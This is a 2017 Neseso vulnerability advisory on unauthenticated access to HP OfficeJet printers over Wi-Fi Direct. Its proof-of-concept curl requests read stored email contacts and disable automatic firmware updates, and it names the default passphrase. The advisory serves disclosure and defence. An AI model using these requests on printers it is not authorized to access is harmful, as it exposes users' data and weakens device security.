HP Printer Improper Access Control

`HP Printers Wi-Fi Direct Improper Access Control  
  
--------------------------------------------------------------------------------  
1. Advisory Information  
  
Title: HP Printers Wi-Fi Improper Access Control  
Advisory ID: NESESO-2017-0111  
Advisory URL: http://neseso.com/advisories/NESESO-2017-0111.pdf  
Date published: 2017-02-01  
Date of last update: 2017-02-01  
Vendors contacted: Hewlett Packard  
Release mode: User Release  
  
--------------------------------------------------------------------------------  
2. Vulnerability Information  
  
Class: Configuration [CWE-16], Improper Access Control [CWE-284]  
Impact: Security bypass  
Remotely Exploitable: Yes  
Locally Exploitable: No  
  
--------------------------------------------------------------------------------  
3. Vulnerability Description  
  
HP printers with Wi-Fi Direct support, let you print from a mobile device  
directly to the printer without connecting to a wireless network. Several of  
these printers are prone to a security vulnerability that allows an external  
system to obtain unrestricted remote read/write access to the printer  
configuration using the embedded web server.  
  
--------------------------------------------------------------------------------  
4. Vulnerable Packages  
  
HP OfficeJet Pro 8710 firmware version WBP2CN1619BR  
HP OfficeJet Pro 8620 firmware version FDP1CN1547AR  
  
Other products and versions might be affected too, but they were not tested.  
  
--------------------------------------------------------------------------------  
5. Vendor Information, Solutions and Workarounds  
  
There was no official answer from HP Inc. after several attempts (see [Sec. 8]);  
contact vendor for further information.  
  
Some mitigation actions may be:  
  
aC/ Disable Wi-Fi Direct functionality to protect your device.  
aC/ Enable Password Settings on the Embedded Web Server.  
  
--------------------------------------------------------------------------------  
6. Credits  
  
This vulnerability was discovered and researched by a member from Neseso  
Research Team.  
  
--------------------------------------------------------------------------------  
7. Technical Description  
  
Wi-Fi Direct Improper Access Control  
  
Wi-Fi Direct [1], initially called Wi-Fi P2P, is a Wi-Fi standard enabling  
devices to easily connect with each other without requiring a wireless access  
point. It is useful for everything from internet browsing to file transfer, and  
to communicate with one or more devices simultaneously at typical Wi-Fi speeds.  
In a scenario where two devices want to connect they can authenticate using  
methods such as PIN, Push-Button or NFC.  
  
HP Printers implement Wi-Fi Direct[2] support in two ways, one as described on  
the Wi-Fi Direct specification and the other providing a wi-fi access point that  
has no security or uses insecure default credentials (12345678 passphrase is  
used by default on newer models). Giving access to anyone that is near enough  
to establish a Wi-Fi connection without any user interaction or notification.  
The second vulnerability is that the printing services and others, such as the  
Embedded Web Server has no authentication by default which gives anyone the  
ability to not only access sensitive information but also modify device  
configuration. These two vulnerabilities exposes user information and gives  
unrestricted remote read/write access to the configuration and services of the  
printer.  
  
Below two examples of HTTP requests that attackers could use to access emails  
stored on the device or disable automatic firmware updates.  
  
$ curl -v --insecure https://192.168.223.1/DevMgmt/Email/Contacts  
* Trying 192.168.223.1...  
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)  
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256  
* Server certificate: HP16B465  
> GET /DevMgmt/Email/Contacts HTTP/1.1  
> Host: 192.168.223.1  
> User-Agent: curl/7.43.0  
> Accept: */*  
>  
< HTTP/1.1 200 OK  
< Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number:  
XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}  
< Content-Type: text/xml  
< Content-Length: 203  
< Cache-Control: must-revalidate, max-age=0  
< Pragma: no-cache  
<  
* Connection #0 to host 192.168.1.17 left intact  
<emaildyn:EmailContacts xmlns:dd="http://www.hp.com/schemas/imaging/con/dictiona  
ries/1.0/" xmlns:emaildyn="http://www.hp.com/schemas/imaging/con/ledm/emailservi  
cedyn/2010/11/22"></emaildyn:EmailContacts>  
  
$ cat data.xml  
<?xml version="1.0" encoding="UTF-8"?>  
<fwudyn:FirmwareUpdateConfig xsi:schemaLocation="http://www.hp.com/schemas/imagi  
ng/con/ledm/firmwareupdatedyn/2010/12/12 ../../schemas/FirmwareUpdateDyn.xsd" xm  
lns:fwudyn="http://www.hp.com/schemas/imaging/con/ledm/firmwareupdatedyn/2010/12  
/12" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<fwudyn:AutomaticCheck>disabled</fwudyn:AutomaticCheck>  
<fwudyn:AutomaticUpdate>disabled</fwudyn:AutomaticUpdate>  
</fwudyn:FirmwareUpdateConfig>  
$ curl -v -X PUT --insecure -d @data.xml https://192.168.223.1/FirmwareUpdate/We  
bFWUpdate/Config --header "Content-Type:text/xml"  
* Trying 192.168.223.1...  
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)  
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256  
* Server certificate: HP16B465  
> PUT /FirmwareUpdate/WebFWUpdate/Config HTTP/1.1  
> Host: 192.168.223.1  
> User-Agent: curl/7.43.0  
> Accept: */*  
> Content-Type:text/xml  
> Content-Length: 487  
>  
* upload completely sent off: 487 out of 487 bytes  
< HTTP/1.1 200 OK  
< Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number: XXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}  
< Content-Length: 0  
< Cache-Control: must-revalidate, max-age=0  
< Pragma: no-cache  
<  
* Connection #0 to host 192.168.223.1 left intact  
  
Attackers can do other attacks such as setting a proxy, doing configuration  
backups, getting network information among others.  
  
--------------------------------------------------------------------------------  
8. Report Timeline  
  
2017-01-11: Neseso attempted to contact HP Inc. security contact.  
2017-01-13: Neseso attempted to contact HP Inc. security contact.  
2017-01-16: Neseso attempted to contact HP Inc. security contact for third time  
using the web form to report vulnerabilities on Hewlett Packard  
Enterprise site.  
2017-01-17: HP Enterprise contact reply that printers vulnerabilities must be  
reported to contact HP Inc.  
2017-01-17: Neseso asked HP Enterprise if there is other security contact for HP  
Inc. besides the one used before.  
2017-01-17: HP Enterprise security contact replied that the security contact for  
HP Inc. is correct and we should contact them.  
2017-01-17: Neseso attempted for fourth time to contact HP Inc. security  
contact.  
2017-01-23: Neseso notifies that if the vendor refuses to response the advisory  
will be released on February 1st, 2017.  
2017-01-26: Neseso informed HP Inc. that it is their last chance to answer the  
emails, if not the advisory was going to be released on February  
1st, 2017.  
2017-02-01: Advisory NESESO-2017-0111 published as 'user release'.  
  
--------------------------------------------------------------------------------  
9. References  
  
[1] - http://www.wi-fi.org/discover-wi-fi/wi-fi-direct  
[2] - http://www8.hp.com/us/en/ads/mobility/wireless-direct-printing.html  
  
--------------------------------------------------------------------------------  
10. About Neseso  
  
Neseso is an independent security consulting company with more than 10 years of  
experience in security research and vulnerability assessment.  
  
--------------------------------------------------------------------------------  
11. Copyright Notice  
  
The contents of this advisory are copyright (c) 2016 Neseso and are licensed  
under a Creative Commons Attribution Non-Commercial Share-Alike 4.0 License:  
http://creativecommons.org/licenses/by-nc-sa/4.0/  
`